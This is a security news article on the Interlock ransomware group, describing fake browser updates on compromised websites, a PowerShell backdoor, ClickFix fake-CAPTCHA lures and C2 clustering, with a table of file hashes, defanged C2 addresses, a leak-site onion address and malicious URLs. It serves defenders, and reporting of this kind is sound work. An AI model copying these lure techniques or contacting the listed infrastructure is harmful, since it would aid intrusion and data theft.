Friday, May 9, 2025
HomeBrowserInterlock Ransomware Uses Multi-Stage Attack Through Legitimate Websites to Deliver Malicious Browser...

Interlock Ransomware Uses Multi-Stage Attack Through Legitimate Websites to Deliver Malicious Browser Updates

Published on

SIEM as a Service

Follow Us on Google News

The Interlock ransomware intrusion set has escalated its operations across North America and Europe with sophisticated techniques.

Not falling under the typical Ransomware-as-a-Service (RaaS) category, Interlock operates independently, focusing primarily on Big Game Hunting and double extortion campaigns.

This group’s activities have been closely monitored by cybersecurity firms such as Sekoia Threat Detection & Research (TDR) and others, revealing their evolving tactics and tools.

- Advertisement - Google News

Attack Mechanism and Execution

Interlock initiates its attack by compromising legitimate websites to host deceptive browser update pages, leveraging the trust users have in these platforms.

Interlock Ransomware
Screenshot of Interlock’s DLS

Here’s how the attack unfolds:

1. Fake Updater Deployment:

    The ransomware’s initial access vector is a fake browser update hosted on compromised websites.

    These updates appear as legitimate Google Chrome or Microsoft Edge installers but are, in fact, PyInstaller files. When a user executes this update, it:

    • Downloads and runs a legitimate installer.
    • Simultaneously, it launches a PowerShelcl script acting as a backdoor.

    2.PowerShell Backdoor:

    This script operates in a loop, continuously executing HTTP requests to communicate with command-and-control (C2) servers. It’s designed for resilience, utilizing:

    • A continuous communication loop with the C2 server for persistence.
    • Collection of system information including user context, system details, and more, then transmitting this data to the attacker.

    3.Command Execution:

    The C2 server can issue various commands, including:

    • Terminating the backdoor.
    • Deploying additional malware like keyloggers or credential stealers (e.g., LummaStealer, BerserkStealer).

      Domain and IP Clustering for Resilience

      According to the Report, Interlock’s operators employ a strategy of IP address clustering to maintain their infrastructure’s resilience:

      Cluster Composition

      Each cluster typically includes:

      • One IP from BitLaunch, allowing cryptocurrency transactions.
      • One from Hetzner Online GmbH, known for its robust hosting services.
      • A third from various autonomous systems to complicate disruption efforts.

      ClickFix Technique for Initial Access

      Around January 2025, Interlock adopted the ClickFix technique:

      • Deceptive Prompts: Victims are persuaded to manually execute malicious PowerShell commands through fake CAPTCHA verifications or system prompts.
      • Fake Installer Distribution: This technique was used to distribute a fake installer payload, but its usage seemed to have been abandoned by February 2025.
      Interlock Ransomware
       Fake Cloudflare CAPTCHA asking users to execute a command to access a website

      The sophistication and evolution of Interlock’s tactics, from using fake browser updates to employing social engineering techniques like ClickFix, illustrate its adaptability and potential for further growth.

      With a focus on high-value targets and the ability to evade traditional network security, Interlock remains a significant threat.

      Cybersecurity measures must be updated continuously to counter the dynamic strategies of this ransomware group.

      Indicators of Compromise (IoC)

      The following table lists the IoCs associated with Interlock’s activities:

      CategoryIndicator TypeIndicators
      Fake UpdaterSHA-256576d07cc8919c68914bf08663e0afd00d9f9fbf5263b5cccbded5d373905a296, f962e15c6efebb3c29fe399bb168066042b616affddd83f72570c979184ec55c, … (additional hashes)
      ClickFix PowerShell LoadersSHA-2565c697162527a468a52c9e7b7dc3257dae4ae5142db62257753969d47f1db533e, eb587b2603dfc14b420865bb862fc905cb85fe7b4b5a781a19929fc2da88eb34, … (additional hashes)
      Interlock RATSHA-2561105a3050e6c842fb9411d4f21fd6fdb119861c15f7743e244180a4e64b19b83, 299a8ef490076664675e3b52d6767bf89ddfa6accf291818c537a600a96290d2, … (additional hashes)
      KeyloggerSHA-2565cbc2ae758043bb58664c28f32136e9cada50a8dc36c69670ddef0a3ef6757d8, df41085a8aa9ee9da6a03db08ad910b6ef5fcdc8fee7ebb19744331c5e70c782, … (additional hashes)
      BerserkStealerSHA-256eb1cdf3118271d754cf0a1777652f83c3d11dc1f9a2b51e81e37602c43b47692, a5623b6a6f289bb328e4007385bdb1659407a9e825990a0faaef3625a2e782cf
      LummaStealerSHA-2564672fe8b37b71be834825a2477d956e0f76f7d2016c194f1538139d21703fd6e
      Windows Interlock ransomwareSHA-2564a97599ff5823166112d9221d0e824af7896f6ca40cd3948ec129533787a3ea9, 33dc991e61ba714812aa536821b073e4274951a1e4a9bc68f71a802d034f4fb9, … (additional hashes)
      Small autoremove DLL used by the ransomwareSHA-256c9920e995fbc98cd3883ef4c4520300d5e82bab5d2a5c781e9e9fe694a43e82f
      Linux Interlock ransomwareSHA-25628c3c50d115d2b8ffc7ba0a8de9572fbe307907aaae3a486aabd8c0266e9426f
      Data Leak SiteURLhttp://ebhmkoohccl45qesdbvrjqtyro2hmhkmh6vkyfyjjzfllm3ix72aqaid[.]onion
      Backdoor C2 – Cluster 1IP Address23.95.182[.]59, 195.201.21[.]34, 159.223.46[.]184
      Backdoor C2 – Cluster 2IP Address23.227.203[.]162, 65.109.226[.]176, 65.38.120[.]47
      Backdoor C2 – Cluster 3IP Address216.245.184[.]181, 212.237.217[.]182, 168.119.96[.]41
      Backdoor C2 – Cluster 4IP Address216.245.184[.]170, 65.108.80[.]58, 84.200.24[.]41
      Backdoor C2 – Cluster 5IP Address206.206.123[.]65, 49.12.102[.]206, 193.149.180[.]158
      Backdoor C2 – Cluster 6IP Address85.239.52[.]252, 5.252.177[.]228, 80.87.206[.]189
      Backdoor C2 – Cluster 7IP Address65.108.80[.]58, 212.104.133[.]72, 140.82.14[.]117
      Backdoor C2 – Cluster 8IP Address64.94.84[.]85, 49.12.69[.]80, 96.62.214[.]11
      Backdoor C2 – Cluster 9IP Address177.136.225[.]153, 188.34.195[.]44, 45.61.136[.]202
      Compromised URLsURLhttp://topsportracing[.]com/wp-az, http://topsportracing[.]com/az10, https://airbluefootgear[.]com/wp-includes/images/xits.php, … (additional URLs)
      ClickFix URLsURLhttps://microsoft-msteams[.]com/additional-check.html, https://microstteams[.]com/additional-check.html, https://advanceipscaner[.]com/additional-check.html, … (additional URLs)
      PowerShell backdoor C2 domainsURLrefrigerator-cheers-indicator-ferrari[.]trycloudflare.com, analytical-russell-cincinnati-settings[.]trycloudflare.com, … (additional URLs)

      Find this News Interesting! Follow us on Google NewsLinkedIn, & X to Get Instant Updates!

      Aman Mishra
      Aman Mishra
      Aman Mishra is a Security and privacy Reporter covering various data breach, cyber crime, malware, & vulnerability.

      Latest articles

      Chinese Hackers Exploit SAP RCE Vulnerability to Deploy Supershell Backdoors

      A critical remote code execution (RCE) vulnerability, identified as CVE-2025-31324, in SAP NetWeaver Visual...

      Hackers Target IT Admins by Poisoning SEO to Push Malware to Top Search Results

      Cybercriminals are increasingly targeting IT administrators through sophisticated Search Engine Optimization (SEO) poisoning techniques. By...

      New Mamona Ransomware Targets Windows Systems Using Abused Ping Command

      Cybersecurity researchers are raising the alarm about a newly discovered commodity ransomware strain dubbed Mamona,...

      Malicious Python Package Impersonates Discord Developers to Deploy Remote Commands

      A seemingly innocuous Python package named ‘discordpydebug’ surfaced on the Python Package Index (PyPI)...

      Resilience at Scale

      Why Application Security is Non-Negotiable

      The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

      Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

      Discussion points


      Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
      Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
      Ensuring 100% application availability through platforms architected for failure resilience.
      Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

      More like this

      Chinese Hackers Exploit SAP RCE Vulnerability to Deploy Supershell Backdoors

      A critical remote code execution (RCE) vulnerability, identified as CVE-2025-31324, in SAP NetWeaver Visual...

      Hackers Target IT Admins by Poisoning SEO to Push Malware to Top Search Results

      Cybercriminals are increasingly targeting IT administrators through sophisticated Search Engine Optimization (SEO) poisoning techniques. By...

      New Mamona Ransomware Targets Windows Systems Using Abused Ping Command

      Cybersecurity researchers are raising the alarm about a newly discovered commodity ransomware strain dubbed Mamona,...